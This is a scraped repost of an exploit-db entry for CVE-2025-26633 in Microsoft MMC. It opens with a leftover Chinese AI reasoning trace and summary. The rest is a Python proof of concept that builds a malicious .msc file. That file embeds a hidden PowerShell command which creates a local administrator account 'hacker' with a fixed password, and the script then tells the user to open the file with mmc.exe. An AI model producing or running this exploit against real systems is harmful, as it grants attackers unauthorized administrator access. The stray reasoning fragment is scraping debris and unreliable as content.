[local] Microsoft MMC MSC EvilTwin - Local Admin Creation
嗯,用户发来一个请求,让我帮他总结一下一篇文章的内容,控制在100个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。 首先,我需要仔细阅读用户提供的文章内容。看起来这是一篇关于微软MMC组件漏洞的 exploit 文章。文章提到了CVE-2025-26633,影响Windows 10、11和Server 2016到2025版本。攻击者可以利用这个漏洞创建本地管理员账户,权限很高。 接下来,用户的要求是总结内容在100字以内。我需要抓住关键点:漏洞名称、影响版本、攻击效果、CVSS评分以及修复方法。这些信息都是最重要的。 然后,我要确保语言简洁明了,不使用复杂的术语,让读者一目了然。同时,不需要任何开头语句,直接进入描述。 最后,检查一下字数是否符合要求,并确保所有关键信息都被涵盖。这样用户就能快速了解文章的核心内容了。 </think> 该文章描述了微软MMC组件中的一个高危漏洞(CVE-2025-26633),允许攻击者通过恶意.msc文件创建本地管理员账户并获取高权限。该漏洞影响Windows 10、11及部分服务器版本,CVSS评分为7.8(高危),可通过微软补丁修复。 2026-4-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏 
#!/usr/bin/env python3
# Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation 
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (built-in Windows component - mmc.exe)
# Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025
# Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched)
# CVE: CVE-2025-26633
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# Category: Local
# Platform: Windows
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)

# CVE-2025-26633 Proof of Concept – Add Local Administrator Account
# Use ONLY in authorized penetration testing or isolated research labs

import os
import xml.etree.ElementTree as ET

# PAYLOAD: Adds local administrator account "hacker" silently
PAYLOAD = (
    'powershell.exe -NoP -W Hidden -C "'
    '$user = \\\'hacker\\\'; '
    '$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; '
    'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' '
    '-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; '
    'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user '
    '-ErrorAction SilentlyContinue; '
    'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"'
)

def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
    
    string_table = ET.SubElement(root, "StringTable")
    ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
    ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"
    
    snapins = ET.SubElement(root, "SnapIns")
    snapin = ET.SubElement(snapins, "SnapIn")
    
    ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
    ET.SubElement(snapin, "Description").text = "Custom Administration Tool"
    
    actions = ET.SubElement(snapin, "Actions")
    action = ET.SubElement(actions, "Action")
    ET.SubElement(action, "RunCommand").text = PAYLOAD
    ET.SubElement(action, "Name").text = "AddLocalAdmin"
    
    tree = ET.ElementTree(root)
    tree.write(filename, encoding="utf-16", xml_declaration=True)
    print(f"[+] Malicious .msc file successfully created: {filename}")

def main():
    msc_file = "CVE-2025-26633-AddAdmin.msc"
    create_evil_msc(msc_file)
    
    print("\n[+] Next step (execute inside vulnerable target or lab VM):")
    print(f"    mmc.exe \"{os.path.abspath(msc_file)}\"\n")
    print("[!] Instant local admin account will be created:")
    print("    Username : hacker")
    print("    Password : P@ssw0rd123!")
    print("    Verify with: net localgroup administrators")

if __name__ == "__main__":
    main()

文章来源: https://www.exploit-db.com/exploits/52498
如有侵权请联系:admin#unsafe.sh